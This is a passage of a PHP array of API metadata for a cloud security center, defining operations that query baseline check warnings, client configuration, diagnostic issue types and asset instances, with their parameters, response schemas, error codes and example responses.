'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'CheckWarnings' => [ 'description' => 'The details of the check items returned.', 'type' => 'array', 'items' => [ 'description' => 'The details of a check item.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the check item. Valid values:'."\n" ."\n" .'- **1**: The baseline check failed.'."\n" ."\n" .'- **2**: The baseline fix is being verified.'."\n" ."\n" .'- **3**: The baseline check passed.'."\n" ."\n" .'- **5**: The baseline check status has expired.'."\n" ."\n" .'- **6**: The baseline check item has been ignored.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'CheckWarningId' => ['description' => 'The alert data ID of the baseline check.', 'type' => 'integer', 'format' => 'int64', 'example' => '212251441', 'title' => ''], 'Type' => ['description' => 'The type of the check item.', 'type' => 'string', 'example' => 'hc.check.type.identity_auth', 'title' => ''], 'Uuid' => ['description' => 'The ID of the server on which the baseline check is performed.', 'type' => 'string', 'example' => 'd42f938c-d962-48a0-90f9-****', 'title' => ''], 'ContainerName' => ['description' => 'The container name.', 'type' => 'string', 'example' => '/svn-host', 'title' => ''], 'ContainerId' => ['description' => 'The container ID.', 'type' => 'string', 'example' => '8de456b00ff0a2009ee8ef7fc59fd0457fa44f20b8282af3e79c2a0e2492****', 'title' => ''], 'Item' => ['description' => 'The name of the check item.', 'type' => 'string', 'example' => 'passwordExpire', 'title' => ''], 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '2546', 'title' => ''], 'Level' => ['description' => 'The risk level of the baseline check risk item. Valid values:'."\n" ."\n" .'- **high**: high'."\n" .'- **medium**: medium'."\n" .'- **low**: low.', 'type' => 'string', 'example' => 'high', 'title' => ''], 'Reason' => ['description' => 'The remarks.', 'type' => 'string', 'example' => 'ignore', 'title' => ''], 'FixStatus' => ['description' => 'Indicates whether the fix is supported. Valid values:'."\n" ."\n" .'- **0**: not supported'."\n" .'- **1**: supported.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ExecErrorMessage' => ['description' => 'The error message during the alert data check.', 'type' => 'string', 'example' => 'ScriptKilledOfCpuHigh', 'title' => ''], 'LastHandleTime' => ['description' => 'The timestamp of the most recent handling of the check item risk on the server. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1704937755000', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query check item information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckWarnings'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCheckWarnings', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"RequestId\\": \\"0DFCADBA-7065-42DA-AF17-6868B9C2A8CF\\",\\n \\"TotalCount\\": 100,\\n \\"Count\\": 10,\\n \\"CheckWarnings\\": [\\n {\\n \\"Status\\": 1,\\n \\"CheckWarningId\\": 212251441,\\n \\"Type\\": \\"hc.check.type.identity_auth\\",\\n \\"Uuid\\": \\"d42f938c-d962-48a0-90f9-****\\",\\n \\"ContainerName\\": \\"/svn-host\\",\\n \\"ContainerId\\": \\"8de456b00ff0a2009ee8ef7fc59fd0457fa44f20b8282af3e79c2a0e2492****\\",\\n \\"Item\\": \\"passwordExpire\\",\\n \\"CheckId\\": 2546,\\n \\"Level\\": \\"high\\",\\n \\"Reason\\": \\"ignore\\",\\n \\"FixStatus\\": 0,\\n \\"ExecErrorMessage\\": \\"ScriptKilledOfCpuHigh\\",\\n \\"LastHandleTime\\": 1704937755000\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeClientConfSetup' => [ 'summary' => 'Queries the resource configuration information of a client.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92018', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'StrategyTag', 'in' => 'query', 'schema' => ['description' => 'The resource tag of the client to query.', 'type' => 'string', 'required' => true, 'example' => 'machineResource', 'title' => ''], ], [ 'name' => 'StrategyTagValue', 'in' => 'query', 'schema' => [ 'description' => 'The policy value. Valid values:'."\n" .'- major'."\n" .'- advanced'."\n" .'- basic.', 'enumValueTitles' => [], 'type' => 'string', 'required' => true, 'example' => 'major', 'title' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '151F6EB6-D5F3-417A-AF7B-4D84975D****', 'title' => ''], 'ClientConf' => [ 'description' => 'The resource configuration information of the client.', 'type' => 'object', 'properties' => [ 'StrategyTagValue' => [ 'description' => 'The policy value. Valid values:'."\n" .'- major'."\n" .'- advanced'."\n" .'- basic.', 'enumValueTitles' => [], 'type' => 'string', 'example' => 'major', 'title' => '', ], 'Config' => ['description' => 'The resource configuration information used by the client.', 'type' => 'string', 'example' => '{"mem":"200","cpu":"10","cpu_all":"0"}', 'title' => ''], 'StrategyTag' => ['description' => 'The policy tag.', 'type' => 'string', 'example' => 'machineResource', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query client configuration steps', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClientConfSetup'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeClientConfSetup', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"151F6EB6-D5F3-417A-AF7B-4D84975D****\\",\\n \\"ClientConf\\": {\\n \\"StrategyTagValue\\": \\"major\\",\\n \\"Config\\": \\"{\\\\\\"mem\\\\\\":\\\\\\"200\\\\\\",\\\\\\"cpu\\\\\\":\\\\\\"10\\\\\\",\\\\\\"cpu_all\\\\\\":\\\\\\"0\\\\\\"}\\",\\n \\"StrategyTag\\": \\"machineResource\\"\\n }\\n}","type":"json"}]', ], 'DescribeClientConfStrategy' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Tag', 'in' => 'query', 'schema' => ['description' => 'The resource tag of the client to query.', 'type' => 'string', 'required' => true, 'example' => 'machineResource', 'title' => ''], ], [ 'name' => 'TagValue', 'in' => 'query', 'schema' => [ 'description' => 'The tag value of the asset. Valid values:'."\n" .'- major'."\n" .'- advanced'."\n" .'- basic.', 'enumValueTitles' => [], 'type' => 'string', 'required' => true, 'example' => 'major', 'title' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'RequestId' => ['description' => 'The request ID. China Chinese Cloud generates a unique request ID for each API request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => '5BD95679-D63A-4151-97D0-188432F****', 'title' => ''], 'TargetList' => [ 'description' => 'The returned list.', 'type' => 'array', 'items' => [ 'description' => 'The returned list.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID generated by the Security Center client.', 'type' => 'string', 'example' => '2b1753a6-04d9-448e-ad17-7abdf19f****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query client configuration policy', 'summary' => 'Queries the machine configuration information for different client tags.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClientConfStrategy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeClientConfStrategy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 100,\\n \\"RequestId\\": \\"5BD95679-D63A-4151-97D0-188432F****\\",\\n \\"TargetList\\": [\\n {\\n \\"Uuid\\": \\"2b1753a6-04d9-448e-ad17-7abdf19f****\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeClientProblemType' => [ 'summary' => 'Retrieves the category list of client issue diagnostics.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number displayed in the returned results.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53CXXXXX', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries in the client issue list.', 'type' => 'integer', 'format' => 'int32', 'example' => '21', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'ProblemTypes' => [ 'description' => 'The list of diagnostic types.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'problemId' => ['description' => 'The ID of the diagnostic issue category.', 'type' => 'string', 'example' => '4', 'title' => ''], 'problemType' => ['description' => 'The name of the diagnostic issue category.', 'type' => 'string', 'example' => 'high_cpu', 'title' => ''], 'problemDetail' => ['description' => 'The description of the diagnostic issue category.', 'type' => 'string', 'example' => 'Server Guard Agent Offline', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query client issue list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClientProblemType'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeClientProblemType', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53CXXXXX\\",\\n \\"TotalCount\\": 21,\\n \\"Count\\": 4,\\n \\"ProblemTypes\\": [\\n {\\n \\"problemId\\": \\"4\\",\\n \\"problemType\\": \\"high_cpu\\",\\n \\"problemDetail\\": \\"Server Guard Agent Offline\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeCloudCenterInstances' => [ 'summary' => 'Sets search conditions to perform a conditional query for asset information that matches the specified criteria, such as asset instance name or asset instance region. Both pagination and NextToken methods are supported. The NextToken method is recommended.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92021', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The ID of the region in which the instance resides.', 'type' => 'string', 'deprecated' => true, 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The search conditions for assets. This parameter is in JSON format. Note that the parameter names are case-sensitive.'."\n" .'> You can search for assets by instance ID, instance name, VPC ID, region, public IP address, and other conditions. Call the [DescribeCriteria](~~DescribeCriteria~~) operation to query the supported search conditions.', 'type' => 'string', 'required' => false, 'example' => '[{"name":"riskStatus","value":"YES"},{"name":"internetIp","value":"1.2.XX.XX"}]', 'title' => ''], ], [ 'name' => 'MachineTypes', 'in' => 'query', 'schema' => ['description' => 'The type of asset to query. Valid values:'."\n" ."\n" .'- **ecs**: server'."\n" .'- **cloud_product**: cloud product'."\n" .'- **eci**: elastic container instance'."\n" .'- **rund**: RunD container instance'."\n" .'- **runc**: RunC container instance', 'type' => 'string', 'required' => false, 'example' => 'ecs', 'title' => ''], ], [ 'name' => 'LogicalExp', 'in' => 'query', 'schema' => ['description' => 'The logical relationship between multiple search conditions. Default value: **OR**. Valid values:'."\n" ."\n" .'- **OR**: The search conditions are in an **OR** relationship.'."\n" .'- **AND**: The search conditions are in an **AND** relationship.', 'type' => 'string', 'required' => false, 'example' => 'OR', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paged query. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '100', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the first page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Importance', 'in' => 'query', 'schema' => ['description' => 'The importance of the asset. Valid values:'."\n" .'- **2**: important asset'."\n" .'- **1**: general asset'."\n" .'- **0**: test asset', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], [ 'name' => 'NoGroupTrace', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to skip internationalization processing for the default group **Ungrouped** in Security Center. Default value: **false**. Valid values:'."\n" ."\n" .'- **true**: Internationalization processing is skipped. When the value of the GroupTrace response parameter is the Security Center default group **Ungrouped**, it is displayed as **未分组**.'."\n" .'- **false**: Internationalization processing is applied. When the value of the GroupTrace response parameter is the Security Center default group **Ungrouped**, it is displayed as **default**.', 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'UseNextToken', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'Specifies whether to use the NextToken method to retrieve asset list data. If this parameter is set to true, TotalCount is no longer returned. Valid values:'."\n" ."\n" .'- **true**: Uses the NextToken method.'."\n" .'- **false**: Does not use the NextToken method.', 'type' => 'boolean', 'required' => false, 'example' => 'false'], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The NextToken value returned when the NextToken method is used. Leave this parameter empty for the first request.', 'type' => 'string', 'required' => false, 'example' => 'E17B501887A2D3AA5E8360A6EFA3B***'], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member accounts in the resource folder.'."\n" .'>Invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], [ 'name' => 'Flags', 'in' => 'query', 'schema' => ['description' => 'The asset vendor. Separate multiple vendors with commas (,). Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: non-cloud asset'."\n" .'- **2**: IDC asset'."\n" .'- **3**, **4**, **5**, **7**, **14**, **16**: third-party cloud asset'."\n" .'- **8**: lightweight asset'."\n" .'- **9**: SAE'."\n" .'- **10**: PAI', 'type' => 'string', 'required' => false, 'example' => '1,2,3', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '32A73759-4C0F-4801-BE98-901223ACEE9A', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page in a paged query. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of assets returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '50', 'title' => ''], 'Count' => ['description' => 'The number of assets on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'NextToken' => ['title' => '', 'description' => 'The NextToken value returned when the NextToken method is used.', 'type' => 'string', 'example' => 'B604532DEF982B875E8360A6EFA3B***'], ], 'title' => '', 'example' => '', ], 'Instances' => [ 'description' => 'The list of asset details.', 'type' => 'array', 'items' => [ 'description' => 'The asset details.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The running status of the instance. Valid values:'."\n" ."\n" .'- **Running**: Running.'."\n" .'- **notRunning**: Stopped.', 'type' => 'string', 'example' => 'Running', 'title' => ''], 'CpuInfo' => ['description' => 'The CPU information of the asset.', 'type' => 'string', 'example' => 'Intel(R) Xeon(R) Platinum 8269CY CPU @ 2.50GHz', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the instance.', 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'Kernel' => ['description' => 'The kernel version information.', 'type' => 'string', 'example' => '3.10.0-1127.19.1.el7.x86_64', 'title' => ''], 'Bind' => ['description' => 'Indicates whether the asset is bound to an authorization. Valid values:'."\n" ."\n" .'- **true**: Bound.'."\n" .'- **false**: Not bound.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'OsName' => ['description' => 'The kernel version of the instance.', 'type' => 'string', 'example' => '-', 'title' => ''], 'Tag' => ['description' => 'The tag name of the asset instance.', 'type' => 'string', 'example' => 'InternetIp,test', 'title' => ''], 'ClientStatus' => ['description' => 'The online status of the client on the instance. Valid values:'."\n" ."\n" .'- **online**: Online. The Agent client status is **Enabled**.'."\n" .'- **offline**: Offline. The Agent client status is **Disabled**.'."\n" .'- **pause**: Paused. The Agent client status is **Protection Paused**.', 'type' => 'string', 'example' => 'online', 'title' => ''], 'Mem' => ['description' => 'The memory size, in MB.', 'type' => 'integer', 'format' => 'int32', 'example' => '1024', 'title' => ''], 'VpcInstanceId' => ['description' => 'The ID of the VPC to which the instance belongs.', 'type' => 'string', 'example' => 'vpc-uf60agqq65bs98zoo****', 'title' => ''], 'TagId' => ['description' => 'The tag ID of the asset.', 'type' => 'string', 'example' => '121313,41412', 'title' => ''], 'Flag' => ['description' => 'Indicates whether the instance is an Alibaba Cloud asset. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: non-Alibaba Cloud asset', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'LastLoginTimestamp' => ['description' => 'The timestamp when the client last went online. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1637592907000', 'title' => ''], 'AuthVersion' => ['description' => 'The authorization version of the asset. Valid values:'."\n" .''."\n" .'- **1**: Free Edition'."\n" .'- **6**: Anti-virus Edition'."\n" .'- **5**: Advanced'."\n" .'- **3**: Enterprise Edition'."\n" .'- **7**: Ultimate Edition'."\n" .''."\n" ."\n" .''."\n" .'- **1**: Free Edition'."\n" .'- **6**: Anti-virus Edition'."\n" .'- **5**: Advanced'."\n" .'- **3**: Enterprise Edition'."\n" .'- **7**: Ultimate Edition'."\n" .'', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Region' => ['description' => 'The ID of the region to which the instance belongs.', 'type' => 'string', 'example' => 'cn-hangzhou-cm***-***', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'yztest-l***', 'title' => ''], 'PodCount' => ['description' => 'The number of pods.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'VulCount' => ['description' => 'The number of vulnerabilities on the instance.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'HcStatus' => ['description' => 'Indicates whether baseline risks are detected on the instance. Valid values:'."\n" .'- **YES**: Baseline risks are detected.'."\n" .'- **NO**: No baseline risks are detected.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'CreatedTime' => ['description' => 'The timestamp when the cluster was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1607365213000', 'title' => ''], 'GroupTrace' => ['description' => 'The name of the group to which the asset belongs.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c690a0789419f4284a4e0a29e12fe****', 'title' => ''], 'RiskStatus' => ['description' => 'Indicates whether security risks exist on the asset. Valid values:'."\n" .'- **YES**: Security risks exist.'."\n" .'- **NO**: No security risks exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'Cores' => ['description' => 'The number of CPU cores of the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'VulStatus' => ['description' => 'Indicates whether vulnerabilities exist on the instance. Valid values:'."\n" .'- **YES**: Vulnerabilities exist.'."\n" .'- **NO**: No vulnerabilities exist.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'AlarmStatus' => ['description' => 'Indicates whether security alerts exist on the asset. Valid values:'."\n" .'- **YES**: Security alerts exist.'."\n" .'- **NO**: No security alerts exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'MacListString' => ['description' => 'The MAC address of the system.', 'type' => 'string', 'example' => '00:13:3e:31:13:39,02:12:67:b8:**:**', 'title' => ''], 'Importance' => ['description' => 'The importance of the asset. Valid values:'."\n" .'- **2**: important asset'."\n" .'- **1**: general asset'."\n" .'- **0**: test asset', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'HealthCheckCount' => ['description' => 'The number of baseline risks on the instance.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Ip' => ['description' => 'The public IP address of the instance.', 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'Os' => ['description' => 'The operating system of the instance.', 'type' => 'string', 'example' => 'Linux', 'title' => ''], 'AuthModifyTime' => ['description' => 'The timestamp when the authorization was bound to the asset. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1627974044000', 'title' => ''], 'SafeEventCount' => ['description' => 'The number of security alerts on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID.', 'type' => 'string', 'example' => 'i-m5***', 'title' => ''], 'AssetType' => ['description' => 'The type of the asset. Valid values:'."\n" ."\n" .'- **0**: server'."\n" .'- **1**: load balancer'."\n" .'- **2**: NAT gateway'."\n" .'- **3**: ApsaraDB RDS database'."\n" .'- **4**: ApsaraDB for MongoDB database'."\n" .'- **5**: ApsaraDB for Redis database'."\n" .'- **6**: container image'."\n" .'- **7**: container', 'type' => 'string', 'example' => '0', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the instance.', 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'Vendor' => ['description' => 'The asset vendor. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: non-cloud asset'."\n" .'- **2**: IDC asset'."\n" .'- **3**, **4**, **5**, **7**, **14**, **16**: third-party cloud asset'."\n" .'- **8**: lightweight asset'."\n" .'- **9**: SAE'."\n" .'- **10**: PAI', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region in which the asset resides.', 'type' => 'string', 'example' => 'cn-hanghzou', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the instance.', 'type' => 'string', 'example' => 'c9107c04-942f-40c1-981a-f1c1***', 'title' => ''], 'GroupId' => ['description' => 'The ID of the group to which the instance belongs.', 'type' => 'integer', 'format' => 'int64', 'example' => '4120080', 'title' => ''], 'RegionName' => ['description' => 'The name of the region in which the asset resides.', 'type' => 'string', 'example' => 'China (Hangzhou)', 'title' => ''], 'VendorName' => ['description' => 'The name of the asset vendor.'."\n" ."\n" .'Valid values:'."\n" .'- **ALIYUN**: Alibaba Cloud'."\n" .'- **OUT**: non-cloud asset'."\n" .'- **IDC**: IDC'."\n" .'- **TENCENT**: third-party cloud'."\n" .'- **HUAWEICLOUD**: third-party cloud'."\n" .'- **Microsoft**: third-party cloud'."\n" .'- **AWS**: third-party cloud'."\n" .'- **TRIPARTITE**: lightweight server'."\n" .'- **SAE**: SAE'."\n" .'- **PAI**: PAI'."\n" .'- **VOLCENGINE**: third-party cloud'."\n" .'- **google**: third-party cloud', 'type' => 'string', 'example' => 'IDC', 'title' => ''], 'AuthVersionName' => ['description' => 'The name of the authorization version of the asset. Valid values:'."\n" ."\n" .'- Free Edition'."\n" .'- Anti-virus Edition'."\n" .'- Advanced'."\n" .'- Enterprise Edition'."\n" .'- Ultimate Edition', 'type' => 'string', 'example' => 'Ultimate Edition', 'title' => ''], 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'cluster1', 'title' => ''], 'ExposedStatus' => ['description' => 'The exposure status of the asset. Valid values:'."\n" ."\n" .'- **0**: Not exposed.'."\n" .'- **1**: Exposed.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RiskCount' => ['description' => 'The risk statistics of the asset. The value is in JSON format and contains the following fields:'."\n" ."\n" .'- **account**: the number of accounts with unusual logons or successful brute-force attacks'."\n" .'- **appNum**: the number of scanner vulnerabilities'."\n" .'- **asapVulCount**: the total number of high-priority vulnerabilities'."\n" .'- **baselineHigh**: the number of high-risk baseline risks'."\n" .'- **baselineLow**: the number of low-risk baseline risks'."\n" .'- **baselineMedium**: the number of medium-risk baseline risks'."\n" .'- **baselineNum**: the total number of cloud product configuration risks'."\n" .'- **cmsNum**: the number of Web-CMS vulnerabilities'."\n" .'- **containerAsap**: the number of high-priority container vulnerabilities'."\n" .'- **containerLater**: the number of medium-priority container vulnerabilities'."\n" .'- **containerNntf**: the number of low-priority container vulnerabilities'."\n" .'- **containerRemind**: the number of container reminder alerting events'."\n" .'- **containerSerious**: the number of container critical alerting events'."\n" .'- **containerSuspicious**: the number of container suspicious alerting 